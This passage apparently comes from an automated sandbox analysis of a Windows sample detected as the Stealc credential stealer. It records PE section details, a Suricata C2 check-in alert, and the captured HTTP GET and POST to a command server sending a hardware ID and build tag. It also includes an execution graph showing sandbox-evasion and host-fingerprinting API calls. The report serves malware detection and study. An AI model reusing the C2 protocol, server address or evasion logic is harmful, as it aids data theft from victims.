                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                          Sections

                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                          0x10000x2490000x16200fdf3e8600cf69379950b7b74cd7020e8unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          .rsrc0x24a0000x1f00x2009536d2b3a2eda870e2407104c9596139False0.576171875data5.048164681214948IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          .idata 0x24b0000x10000x2000d0399d83a742d5d86c5718841e8e842False0.134765625data0.8646718654202081IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          0x24c0000x2a50000x20010240a7fcb41086139206364ed131c18unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          yktwzmco0x4f10000x19b0000x19a20058b6bd77edf5dbbb483d237bcd0b5470False0.9947829358427309data7.954359902846811IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          jxtdziyw0x68c0000x10000x400df5242f0eea27f8f28fe45f45a47a29dFalse0.8271484375data6.368137940541943IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          .taggant0x68d0000x30000x2200b35facca0a08b8783985a2cda6453abaFalse0.07157628676470588DOS executable (COM)0.8576478901385488IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                          Resources

                          NameRVASizeTypeLanguageCountryZLIB Complexity
                          RT_MANIFEST0x24a0580x198ASCII text, with CRLF line terminators0.5833333333333334

                          Imports

                          DLLImport
                          kernel32.dlllstrcpy

                          Network Behavior

                          Suricata IDS Alerts

                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                          2024-12-01T03:32:19.481696+01002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.649720185.215.113.20680TCP

                          Network Port Distribution

                          TCP Packets

                          TimestampSource PortDest PortSource IPDest IP
                          Dec 1, 2024 03:32:17.226110935 CET4972080192.168.2.6185.215.113.206
                          Dec 1, 2024 03:32:17.346149921 CET8049720185.215.113.206192.168.2.6
                          Dec 1, 2024 03:32:17.346313953 CET4972080192.168.2.6185.215.113.206
                          Dec 1, 2024 03:32:17.347270966 CET4972080192.168.2.6185.215.113.206
                          Dec 1, 2024 03:32:17.467123985 CET8049720185.215.113.206192.168.2.6
                          Dec 1, 2024 03:32:18.724034071 CET8049720185.215.113.206192.168.2.6
                          Dec 1, 2024 03:32:18.725709915 CET4972080192.168.2.6185.215.113.206
                          Dec 1, 2024 03:32:19.030740976 CET4972080192.168.2.6185.215.113.206
                          Dec 1, 2024 03:32:19.150787115 CET8049720185.215.113.206192.168.2.6
                          Dec 1, 2024 03:32:19.481605053 CET8049720185.215.113.206192.168.2.6
                          Dec 1, 2024 03:32:19.481695890 CET4972080192.168.2.6185.215.113.206
                          Dec 1, 2024 03:32:24.177006006 CET4972080192.168.2.6185.215.113.206

                          HTTP Request Dependency Graph

                          • 185.215.113.206

                          HTTP Packets

                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          0192.168.2.649720185.215.113.206807028C:\Users\user\Desktop\file.exe
                          TimestampBytes transferredDirectionData
                          Dec 1, 2024 03:32:17.347270966 CET90OUTGET / HTTP/1.1
                          Host: 185.215.113.206
                          Connection: Keep-Alive
                          Cache-Control: no-cache
                          Dec 1, 2024 03:32:18.724034071 CET203INHTTP/1.1 200 OK
                          Date: Sun, 01 Dec 2024 02:32:18 GMT
                          Server: Apache/2.4.41 (Ubuntu)
                          Content-Length: 0
                          Keep-Alive: timeout=5, max=100
                          Connection: Keep-Alive
                          Content-Type: text/html; charset=UTF-8
                          Dec 1, 2024 03:32:19.030740976 CET413OUTPOST /c4becf79229cb002.php HTTP/1.1
                          Content-Type: multipart/form-data; boundary=----IDAAKEHJDHJKEBFHJEGD
                          Host: 185.215.113.206
                          Content-Length: 211
                          Connection: Keep-Alive
                          Cache-Control: no-cache
                          Data Raw: 2d 2d 2d 2d 2d 2d 49 44 41 41 4b 45 48 4a 44 48 4a 4b 45 42 46 48 4a 45 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 32 43 31 36 36 31 37 39 32 41 43 33 33 34 33 34 31 32 31 34 38 0d 0a 2d 2d 2d 2d 2d 2d 49 44 41 41 4b 45 48 4a 44 48 4a 4b 45 42 46 48 4a 45 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 72 75 6d 0d 0a 2d 2d 2d 2d 2d 2d 49 44 41 41 4b 45 48 4a 44 48 4a 4b 45 42 46 48 4a 45 47 44 2d 2d 0d 0a
                          Data Ascii: ------IDAAKEHJDHJKEBFHJEGDContent-Disposition: form-data; name="hwid"B2C1661792AC3343412148------IDAAKEHJDHJKEBFHJEGDContent-Disposition: form-data; name="build"drum------IDAAKEHJDHJKEBFHJEGD--
                          Dec 1, 2024 03:32:19.481605053 CET210INHTTP/1.1 200 OK
                          Date: Sun, 01 Dec 2024 02:32:19 GMT
                          Server: Apache/2.4.41 (Ubuntu)
                          Content-Length: 8
                          Keep-Alive: timeout=5, max=99
                          Connection: Keep-Alive
                          Content-Type: text/html; charset=UTF-8
                          Data Raw: 59 6d 78 76 59 32 73 3d
                          Data Ascii: YmxvY2s=


                          Statistics

                          CPU Usage

                          Click to jump to process

                          Memory Usage

                          Click to jump to process

                          High Level Behavior Distribution

                          Click to dive into process behavior distribution

                          System Behavior

                          General

                          Target ID:1
                          Start time:21:32:10
                          Start date:30/11/2024
                          Path:C:\Users\user\Desktop\file.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\Desktop\file.exe"
                          Imagebase:0x8e0000
                          File size:1'785'856 bytes
                          MD5 hash:A8D083B25843D8B182146793D9665AC5
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000001.00000003.2188621265.0000000004F70000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000001.00000002.2277505797.00000000012DE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                          Reputation:low
                          Has exited:true

                          Disassembly

                          Reset < >

                            Execution Graph

                            Execution Coverage:4.6%
                            Dynamic/Decrypted Code Coverage:0%
                            Signature Coverage:25%
                            Total number of Nodes:1410
                            Total number of Limit Nodes:28
                            execution_graph 28656 903590 GetProcessHeap RtlAllocateHeap GlobalMemoryStatusEx wsprintfA 28675 904690 OpenProcess GetModuleFileNameExA CloseHandle lstrcpy 28676 903e90 GetProcessHeap RtlAllocateHeap wsprintfA lstrcpy 28664 8f8755 48 API calls 28645 8f4c89 303 API calls 28695 8ef789 144 API calls 28701 8eb309 98 API calls 28646 8f8755 49 API calls 28666 8edd07 572 API calls 28702 8e7702 free ctype 28657 90959d 126 API calls 3 library calls 28667 8fad02 120 API calls 28704 903300 GetProcessHeap RtlAllocateHeap RegOpenKeyExA RegQueryValueExA RegCloseKey 28677 908681 121 API calls 2 library calls 28669 902d30 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 28706 902f30 11 API calls 28684 8fe229 147 API calls 28707 8f0329 126 API calls 28685 8e8e20 strlen free std::exception::exception 28678 902ea0 GetUserDefaultLocaleName LocalAlloc CharToOemW 28686 902a23 lstrcpy 28647 8f6cb9 138 API calls 28679 8f3ab9 244 API calls 28697 8f13b9 408 API calls 28680 8e16b9 200 API calls 28708 905045 8 API calls 28709 8ebf39 177 API calls 28687 908a29 free free strlen free _raise 28681 9076ae 6 API calls ctype 28653 903450 7 API calls 28688 902a50 10 API calls 28689 903650 6 API calls 28659 8f8dcb 16 API calls 28691 8fc649 ShellExecuteEx 27208 901dc0 27260 8e2a90 27208->27260 27212 901dd3 27213 901df9 lstrcpy 27212->27213 27214 901e05 27212->27214 27213->27214 27215 901e35 ExitProcess 27214->27215 27216 901e3d GetSystemInfo 27214->27216 27217 901e55 27216->27217 27218 901e4d ExitProcess 27216->27218 27361 8e1030 GetCurrentProcess VirtualAllocExNuma 27217->27361 27223 901e72 27224 901e88 27223->27224 27225 901e80 ExitProcess 27223->27225 27373 902ca0 GetProcessHeap RtlAllocateHeap GetComputerNameA 27224->27373 27227 901eb7 lstrlen 27232 901ecf 27227->27232 27228 901e8d 27228->27227 27582 902c10 GetProcessHeap RtlAllocateHeap GetUserNameA 27228->27582 27230 901ea1 27230->27227 27234 901eb0 ExitProcess 27230->27234 27231 901ef3 lstrlen 27233 901f09 27231->27233 27232->27231 27235 901ee3 lstrcpy lstrcat 27232->27235 27236 901f2a 27233->27236 27237 901f16 lstrcpy lstrcat 27233->27237 27235->27231 27238 902ca0 3 API calls 27236->27238 27237->27236 27239 901f2f lstrlen 27238->27239 27241 901f44 27239->27241 27240 901f6a lstrlen 27242 901f80 27240->27242 27241->27240 27243 901f57 lstrcpy lstrcat 27241->27243 27244 901f9e 27242->27244 27245 901f8a lstrcpy lstrcat 27242->27245 27243->27240 27375 902c10 GetProcessHeap RtlAllocateHeap GetUserNameA 27244->27375 27245->27244 27247 901fa3 lstrlen 27248 901fb7 27247->27248 27249 901fc7 lstrcpy lstrcat 27248->27249 27250 901fda 27248->27250 27249->27250 27251 901ff8 lstrcpy 27250->27251 27252 902000 27250->27252 27251->27252 27253 902026 OpenEventA 27252->27253 27254 902038 CloseHandle Sleep OpenEventA 27253->27254 27255 90205c CreateEventA 27253->27255 27254->27254 27254->27255 27376 901cf0 GetSystemTime 27255->27376 27259 902075 CloseHandle ExitProcess 27583 8e4a60 27260->27583 27262 8e2aa1 27263 8e4a60 2 API calls 27262->27263 27264 8e2ab7 27263->27264 27265 8e4a60 2 API calls 27264->27265 27266 8e2acd 27265->27266 27267 8e4a60 2 API calls 27266->27267 27268 8e2ae3 27267->27268 27269 8e4a60 2 API calls 27268->27269 27270 8e2af9 27269->27270 27271 8e4a60 2 API calls 27270->27271 27272 8e2b0f 27271->27272 27273 8e4a60 2 API calls 27272->27273 27274 8e2b28 27273->27274 27275 8e4a60 2 API calls 27274->27275 27276 8e2b3e 27275->27276 27277 8e4a60 2 API calls 27276->27277 27278 8e2b54 27277->27278 27279 8e4a60 2 API calls 27278->27279 27280 8e2b6a 27279->27280 27281 8e4a60 2 API calls 27280->27281 27282 8e2b80 27281->27282 27283 8e4a60 2 API calls 27282->27283 27284 8e2b96 27283->27284 27285 8e4a60 2 API calls 27284->27285 27286 8e2baf 27285->27286 27287 8e4a60 2 API calls 27286->27287 27288 8e2bc5 27287->27288 27289 8e4a60 2 API calls 27288->27289 27290 8e2bdb 27289->27290 27291 8e4a60 2 API calls 27290->27291 27292 8e2bf1 27291->27292 27293 8e4a60 2 API calls 27292->27293 27294 8e2c07 27293->27294 27295 8e4a60 2 API calls 27294->27295 27296 8e2c1d 27295->27296 27297 8e4a60 2 API calls 27296->27297 27298 8e2c36 27297->27298 27299 8e4a60 2 API calls 27298->27299 27300 8e2c4c 27299->27300 27301 8e4a60 2 API calls 27300->27301 27302 8e2c62 27301->27302 27303 8e4a60 2 API calls 27302->27303 27304 8e2c78 27303->27304 27305 8e4a60 2 API calls 27304->27305 27306 8e2c8e 27305->27306 27307 8e4a60 2 API calls 27306->27307 27308 8e2ca4 27307->27308 27309 8e4a60 2 API calls 27308->27309 27310 8e2cbd 27309->27310 27311 8e4a60 2 API calls 27310->27311 27312 8e2cd3 27311->27312 27313 8e4a60 2 API calls 27312->27313 27314 8e2ce9 27313->27314 27315 8e4a60 2 API calls 27314->27315 27316 8e2cff 27315->27316 27317 8e4a60 2 API calls 27316->27317 27318 8e2d15 27317->27318 27319 8e4a60 2 API calls 27318->27319 27320 8e2d2b 27319->27320 27321 8e4a60 2 API calls 27320->27321 27322 8e2d44 27321->27322 27323 8e4a60 2 API calls 27322->27323 27324 8e2d5a 27323->27324 27325 8e4a60 2 API calls 27324->27325 27326 8e2d70 27325->27326 27327 8e4a60 2 API calls 27326->27327 27328 8e2d86 27327->27328 27329 8e4a60 2 API calls 27328->27329 27330 8e2d9c 27329->27330 27331 8e4a60 2 API calls 27330->27331 27332 8e2db2 27331->27332 27333 8e4a60 2 API calls 27332->27333 27334 8e2dcb 27333->27334 27335 8e4a60 2 API calls 27334->27335 27336 8e2de1 27335->27336 27337 8e4a60 2 API calls 27336->27337 27338 8e2df7 27337->27338 27339 8e4a60 2 API calls 27338->27339 27340 8e2e0d 27339->27340 27341 8e4a60 2 API calls 27340->27341 27342 8e2e23 27341->27342 27343 8e4a60 2 API calls 27342->27343 27344 8e2e39 27343->27344 27345 8e4a60 2 API calls 27344->27345 27346 8e2e52 27345->27346 27347 9065a0 GetPEB 27346->27347 27348 9067d3 LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA 27347->27348 27349 9065d3 27347->27349 27350 906835 GetProcAddress 27348->27350 27351 906848 27348->27351 27358 9065e7 20 API calls 27349->27358 27350->27351 27352 906851 GetProcAddress GetProcAddress 27351->27352 27353 90687c 27351->27353 27352->27353 27354 906885 GetProcAddress 27353->27354 27355 906898 27353->27355 27354->27355 27356 9068a1 GetProcAddress 27355->27356 27357 9068b4 27355->27357 27356->27357 27359 9068e7 27357->27359 27360 9068bd GetProcAddress GetProcAddress 27357->27360 27358->27348 27359->27212 27360->27359 27362 8e105e VirtualAlloc 27361->27362 27363 8e1057 ExitProcess 27361->27363 27364 8e107d 27362->27364 27365 8e108a VirtualFree 27364->27365 27366 8e10b1 27364->27366 27365->27366 27367 8e10c0 27366->27367 27368 8e10d0 GlobalMemoryStatusEx 27367->27368 27370 8e10f5 27368->27370 27371 8e1112 ExitProcess 27368->27371 27370->27371 27372 8e111a GetUserDefaultLangID 27370->27372 27372->27223 27372->27224 27374 902cf4 27373->27374 27374->27228 27375->27247 27588 9019f0 27376->27588 27378 901d51 sscanf 27627 8e2a20 27378->27627 27381 901da6 27382 901db9 27381->27382 27383 901db2 ExitProcess 27381->27383 27384 9001a0 27382->27384 27385 9001b0 27384->27385 27386 9001e9 lstrlen 27385->27386 27387 9001dd lstrcpy 27385->27387 27388 9002a0 27386->27388 27387->27386 27389 9002b7 lstrlen 27388->27389 27390 9002ab lstrcpy 27388->27390 27391 9002cf 27389->27391 27390->27389 27392 9002e6 lstrlen 27391->27392 27393 9002da lstrcpy 27391->27393 27394 9002fe 27392->27394 27393->27392 27395 900315 27394->27395 27396 900309 lstrcpy 27394->27396 27629 901740 27395->27629 27396->27395 27399 90033e 27400 900353 lstrcpy 27399->27400 27401 90035f lstrlen 27399->27401 27400->27401 27402 900378 27401->27402 27403 900399 lstrlen 27402->27403 27404 90038d lstrcpy 27402->27404 27405 9003b8 27403->27405 27404->27403 27406 9003d0 lstrcpy 27405->27406 27407 9003dc lstrlen 27405->27407 27406->27407 27408 90043a 27407->27408 27409 900452 lstrcpy 27408->27409 27410 90045e 27408->27410 27409->27410 27639 8e2e70 27410->27639 27418 900710 27419 901740 4 API calls 27418->27419 27420 90071f 27419->27420 27421 900771 lstrlen 27420->27421 27422 900769 lstrcpy 27420->27422 27423 90078f 27421->27423 27422->27421 27424 9007a1 lstrcpy lstrcat 27423->27424 27425 9007b9 27423->27425 27424->27425 27426 9007e4 27425->27426 27427 9007dc lstrcpy 27425->27427 27428 9007eb lstrlen 27426->27428 27427->27426 27429 900806 27428->27429 27430 90081a lstrcpy lstrcat 27429->27430 27431 900832 27429->27431 27430->27431 27432 900857 27431->27432 27433 90084f lstrcpy 27431->27433 27434 90085e lstrlen 27432->27434 27433->27432 27435 900883 27434->27435 27436 900897 lstrcpy lstrcat 27435->27436 27437 9008ab 27435->27437 27436->27437 27438 9008d4 lstrcpy 27437->27438 27439 9008dc 27437->27439 27438->27439 27440 900921 27439->27440 27441 900919 lstrcpy 27439->27441 28395 902910 GetWindowsDirectoryA 27440->28395 27441->27440 27443 900955 28404 8e4c50 27443->28404 27444 90092d 27444->27443 27445 90094d lstrcpy 27444->27445 27445->27443 27447 90095f 28558 8f8df0 StrCmpCA 27447->28558 27449 90096b 27450 8e1530 8 API calls 27449->27450 27451 90098c 27450->27451 27452 9009b5 lstrcpy 27451->27452 27453 9009bd 27451->27453 27452->27453 28576 8e60d0 80 API calls 27453->28576 27455 9009ca 28577 8f82f0 10 API calls 27455->28577 27457 9009d9 27458 8e1530 8 API calls 27457->27458 27459 9009ff 27458->27459 27460 900a26 lstrcpy 27459->27460 27461 900a2e 27459->27461 27460->27461 28578 8e60d0 80 API calls 27461->28578 27463 900a3b 28579 8f8020 lstrlen lstrcpy StrCmpCA StrCmpCA StrCmpCA 27463->28579 27465 900a46 27466 8e1530 8 API calls 27465->27466 27467 900a71 27466->27467 27468 900aa5 27467->27468 27469 900a99 lstrcpy 27467->27469 28580 8e60d0 80 API calls 27468->28580 27469->27468 27471 900aab 28581 8f8190 lstrlen lstrcpy StrCmpCA lstrlen lstrcpy 27471->28581 27473 900ab6 27474 8e1530 8 API calls 27473->27474 27475 900ac7 27474->27475 27476 900af6 lstrcpy 27475->27476 27477 900afe 27475->27477 27476->27477 28582 8e5640 8 API calls 27477->28582 27479 900b03 27480 8e1530 8 API calls 27479->27480 27481 900b1c 27480->27481 28583 8f73c0 1451 API calls 27481->28583 27483 900b6f 27484 8e1530 8 API calls 27483->27484 27485 900b9f 27484->27485 27486 900bc6 lstrcpy 27485->27486 27487 900bce 27485->27487 27486->27487 28584 8e60d0 80 API calls 27487->28584 27489 900bdb 28585 8f8520 7 API calls 27489->28585 27491 900be8 27492 8e1530 8 API calls 27491->27492 27493 900bf9 27492->27493 28586 8e24e0 230 API calls 27493->28586 27495 900c3b 27496 900d10 27495->27496 27497 900c4f 27495->27497 27499 8e1530 8 API calls 27496->27499 27498 8e1530 8 API calls 27497->27498 27502 900c75 27498->27502 27500 900d29 27499->27500 27501 900d57 27500->27501 27503 900d4f lstrcpy 27500->27503 28590 8e60d0 80 API calls 27501->28590 27504 900ca4 27502->27504 27505 900c9c lstrcpy 27502->27505 27503->27501 28587 8e60d0 80 API calls 27504->28587 27505->27504 27508 900d5d 28591 8fca30 70 API calls 27508->28591 27509 900caa 28588 8f86f0 47 API calls 27509->28588 27512 900d08 27515 900da1 27512->27515 27518 8e1530 8 API calls 27512->27518 27513 900cb5 27514 8e1530 8 API calls 27513->27514 27517 900cc6 27514->27517 27516 900dca 27515->27516 27519 8e1530 8 API calls 27515->27519 27520 900df3 27516->27520 27525 8e1530 8 API calls 27516->27525 28589 8fd2e0 118 API calls 27517->28589 27522 900d89 27518->27522 27524 900dc5 27519->27524 27523 900e1c 27520->27523 27527 8e1530 8 API calls 27520->27527 28592 8fd9a0 103 API calls __call_reportfault 27522->28592 27528 900e45 27523->27528 27533 8e1530 8 API calls 27523->27533 28594 8fe180 149 API calls 27524->28594 27530 900dee 27525->27530 27532 900e17 27527->27532 27534 900e6e 27528->27534 27541 8e1530 8 API calls 27528->27541 28595 8fe6e0 108 API calls 27530->28595 27531 900d8e 27536 8e1530 8 API calls 27531->27536 28596 8fe900 120 API calls 27532->28596 27540 900e40 27533->27540 27538 900e97 27534->27538 27543 8e1530 8 API calls 27534->27543 27537 900d9c 27536->27537 28593 8fee90 98 API calls 27537->28593 27544 900ec0 27538->27544 27548 8e1530 8 API calls 27538->27548 28597 8febc0 110 API calls 27540->28597 27546 900e69 27541->27546 27547 900e92 27543->27547 27549 900ed4 27544->27549 27550 900f9a 27544->27550 28598 8e7bc0 154 API calls 27546->28598 28599 8fed50 108 API calls 27547->28599 27554 900ebb 27548->27554 27555 8e1530 8 API calls 27549->27555 27552 8e1530 8 API calls 27550->27552 27559 900fb3 27552->27559 28600 9043f0 91 API calls 27554->28600 27557 900efa 27555->27557 27560 900f26 lstrcpy 27557->27560 27561 900f2e 27557->27561 27558 900fe1 28604 8e60d0 80 API calls 27558->28604 27559->27558 27562 900fd9 lstrcpy 27559->27562 27560->27561 28601 8e60d0 80 API calls 27561->28601 27562->27558 27565 900fe7 28605 8fca30 70 API calls 27565->28605 27566 900f34 28602 8f86f0 47 API calls 27566->28602 27569 900f92 27572 8e1530 8 API calls 27569->27572 27570 900f3f 27571 8e1530 8 API calls 27570->27571 27573 900f50 27571->27573 27576 901009 27572->27576 28603 8fd2e0 118 API calls 27573->28603 27575 901037 28606 8e60d0 80 API calls 27575->28606 27576->27575 27577 90102f lstrcpy 27576->27577 27577->27575 27579 901044 27581 901065 27579->27581 28607 901830 12 API calls 27579->28607 27581->27259 27582->27230 27584 8e4a76 RtlAllocateHeap 27583->27584 27587 8e4ab4 VirtualProtect 27584->27587 27587->27262 27589 9019fe 27588->27589 27590 901a25 lstrlen 27589->27590 27591 901a19 lstrcpy 27589->27591 27592 901a43 27590->27592 27591->27590 27593 901a55 lstrcpy lstrcat 27592->27593 27594 901a68 27592->27594 27593->27594 27595 901a97 27594->27595 27596 901a8f lstrcpy 27594->27596 27597 901a9e lstrlen 27595->27597 27596->27595 27598 901ab6 27597->27598 27599 901ac2 lstrcpy lstrcat 27598->27599 27600 901ad6 27598->27600 27599->27600 27601 901b05 27600->27601 27602 901afd lstrcpy 27600->27602 27603 901b0c lstrlen 27601->27603 27602->27601 27604 901b28 27603->27604 27605 901b3a lstrcpy lstrcat 27604->27605 27606 901b4d 27604->27606 27605->27606 27607 901b7c 27606->27607 27608 901b74 lstrcpy 27606->27608 27609 901b83 lstrlen 27607->27609 27608->27607 27610 901b9b 27609->27610 27611 901ba7 lstrcpy lstrcat 27610->27611 27612 901bbb 27610->27612 27611->27612 27613 901bea 27612->27613 27614 901be2 lstrcpy 27612->27614 27615 901bf1 lstrlen 27613->27615 27614->27613 27616 901c0d 27615->27616 27617 901c1f lstrcpy lstrcat 27616->27617 27618 901c32 27616->27618 27617->27618 27619 901c61 27618->27619 27620 901c59 lstrcpy 27618->27620 27621 901c68 lstrlen 27619->27621 27620->27619 27622 901c84 27621->27622 27623 901c96 lstrcpy lstrcat 27622->27623 27624 901ca9 27622->27624 27623->27624 27625 901cd8 27624->27625 27626 901cd0 lstrcpy 27624->27626 27625->27378 27626->27625 27628 8e2a24 SystemTimeToFileTime SystemTimeToFileTime 27627->27628 27628->27381 27628->27382 27630 90174f 27629->27630 27631 90176f lstrcpy 27630->27631 27632 901777 27630->27632 27631->27632 27633 9017a7 lstrcpy 27632->27633 27634 9017af 27632->27634 27633->27634 27635 9017df lstrcpy 27634->27635 27636 9017e7 27634->27636 27635->27636 27637 900325 lstrlen 27636->27637 27638 901817 lstrcpy 27636->27638 27637->27399 27638->27637 27640 8e4a60 2 API calls 27639->27640 27641 8e2e82 27640->27641 27642 8e4a60 2 API calls 27641->27642 27643 8e2ea0 27642->27643 27644 8e4a60 2 API calls 27643->27644 27645 8e2eb6 27644->27645 27646 8e4a60 2 API calls 27645->27646 27647 8e2ecb 27646->27647 27648 8e4a60 2 API calls 27647->27648 27649 8e2eec 27648->27649 27650 8e4a60 2 API calls 27649->27650 27651 8e2f01 27650->27651 27652 8e4a60 2 API calls 27651->27652 27653 8e2f19 27652->27653 27654 8e4a60 2 API calls 27653->27654 27655 8e2f3a 27654->27655 27656 8e4a60 2 API calls 27655->27656 27657 8e2f4f 27656->27657 27658 8e4a60 2 API calls 27657->27658 27659 8e2f65 27658->27659 27660 8e4a60 2 API calls 27659->27660 27661 8e2f7b 27660->27661 27662 8e4a60 2 API calls 27661->27662 27663 8e2f91 27662->27663 27664 8e4a60 2 API calls 27663->27664 27665 8e2faa 27664->27665 27666 8e4a60 2 API calls 27665->27666 27667 8e2fc0 27666->27667 27668 8e4a60 2 API calls 27667->27668 27669 8e2fd6 27668->27669 27670 8e4a60 2 API calls 27669->27670 27671 8e2fec 27670->27671 27672 8e4a60 2 API calls 27671->27672 27673 8e3002 27672->27673 27674 8e4a60 2 API calls 27673->27674 27675 8e3018 27674->27675 27676 8e4a60 2 API calls 27675->27676 27677 8e3031 27676->27677 27678 8e4a60 2 API calls 27677->27678 27679 8e3047 27678->27679 27680 8e4a60 2 API calls 27679->27680 27681 8e305d 27680->27681 27682 8e4a60 2 API calls 27681->27682 27683 8e3073 27682->27683 27684 8e4a60 2 API calls 27683->27684 27685 8e3089 27684->27685 27686 8e4a60 2 API calls 27685->27686 27687 8e309f 27686->27687 27688 8e4a60 2 API calls 27687->27688 27689 8e30b8 27688->27689 27690 8e4a60 2 API calls 27689->27690 27691 8e30ce 27690->27691 27692 8e4a60 2 API calls 27691->27692 27693 8e30e4 27692->27693 27694 8e4a60 2 API calls 27693->27694 27695 8e30fa 27694->27695 27696 8e4a60 2 API calls 27695->27696 27697 8e3110 27696->27697 27698 8e4a60 2 API calls 27697->27698 27699 8e3126 27698->27699 27700 8e4a60 2 API calls 27699->27700 27701 8e313f 27700->27701 27702 8e4a60 2 API calls 27701->27702 27703 8e3155 27702->27703 27704 8e4a60 2 API calls 27703->27704 27705 8e316b 27704->27705 27706 8e4a60 2 API calls 27705->27706 27707 8e3181 27706->27707 27708 8e4a60 2 API calls 27707->27708 27709 8e3197 27708->27709 27710 8e4a60 2 API calls 27709->27710 27711 8e31ad 27710->27711 27712 8e4a60 2 API calls 27711->27712 27713 8e31c6 27712->27713 27714 8e4a60 2 API calls 27713->27714 27715 8e31dc 27714->27715 27716 8e4a60 2 API calls 27715->27716 27717 8e31f2 27716->27717 27718 8e4a60 2 API calls 27717->27718 27719 8e3208 27718->27719 27720 8e4a60 2 API calls 27719->27720 27721 8e321e 27720->27721 27722 8e4a60 2 API calls 27721->27722 27723 8e3234 27722->27723 27724 8e4a60 2 API calls 27723->27724 27725 8e324d 27724->27725 27726 8e4a60 2 API calls 27725->27726 27727 8e3263 27726->27727 27728 8e4a60 2 API calls 27727->27728 27729 8e3279 27728->27729 27730 8e4a60 2 API calls 27729->27730 27731 8e328f 27730->27731 27732 8e4a60 2 API calls 27731->27732 27733 8e32a5 27732->27733 27734 8e4a60 2 API calls 27733->27734 27735 8e32bb 27734->27735 27736 8e4a60 2 API calls 27735->27736 27737 8e32d4 27736->27737 27738 8e4a60 2 API calls 27737->27738 27739 8e32ea 27738->27739 27740 8e4a60 2 API calls 27739->27740 27741 8e3300 27740->27741 27742 8e4a60 2 API calls 27741->27742 27743 8e3316 27742->27743 27744 8e4a60 2 API calls 27743->27744 27745 8e332c 27744->27745 27746 8e4a60 2 API calls 27745->27746 27747 8e3342 27746->27747 27748 8e4a60 2 API calls 27747->27748 27749 8e335b 27748->27749 27750 8e4a60 2 API calls 27749->27750 27751 8e3371 27750->27751 27752 8e4a60 2 API calls 27751->27752 27753 8e3387 27752->27753 27754 8e4a60 2 API calls 27753->27754 27755 8e339d 27754->27755 27756 8e4a60 2 API calls 27755->27756 27757 8e33b3 27756->27757 27758 8e4a60 2 API calls 27757->27758 27759 8e33c9 27758->27759 27760 8e4a60 2 API calls 27759->27760 27761 8e33e2 27760->27761 27762 8e4a60 2 API calls 27761->27762 27763 8e33f8 27762->27763 27764 8e4a60 2 API calls 27763->27764 27765 8e340e 27764->27765 27766 8e4a60 2 API calls 27765->27766 27767 8e3424 27766->27767 27768 8e4a60 2 API calls 27767->27768 27769 8e343a 27768->27769 27770 8e4a60 2 API calls 27769->27770 27771 8e3450 27770->27771 27772 8e4a60 2 API calls 27771->27772 27773 8e3469 27772->27773 27774 8e4a60 2 API calls 27773->27774 27775 8e347f 27774->27775 27776 8e4a60 2 API calls 27775->27776 27777 8e3495 27776->27777 27778 8e4a60 2 API calls 27777->27778 27779 8e34ab 27778->27779 27780 8e4a60 2 API calls 27779->27780 27781 8e34c1 27780->27781 27782 8e4a60 2 API calls 27781->27782 27783 8e34d7 27782->27783 27784 8e4a60 2 API calls 27783->27784 27785 8e34f0 27784->27785 27786 8e4a60 2 API calls 27785->27786 27787 8e3506 27786->27787 27788 8e4a60 2 API calls 27787->27788 27789 8e351c 27788->27789 27790 8e4a60 2 API calls 27789->27790 27791 8e3532 27790->27791 27792 8e4a60 2 API calls 27791->27792 27793 8e3548 27792->27793 27794 8e4a60 2 API calls 27793->27794 27795 8e355e 27794->27795 27796 8e4a60 2 API calls 27795->27796 27797 8e3577 27796->27797 27798 8e4a60 2 API calls 27797->27798 27799 8e358d 27798->27799 27800 8e4a60 2 API calls 27799->27800 27801 8e35a3 27800->27801 27802 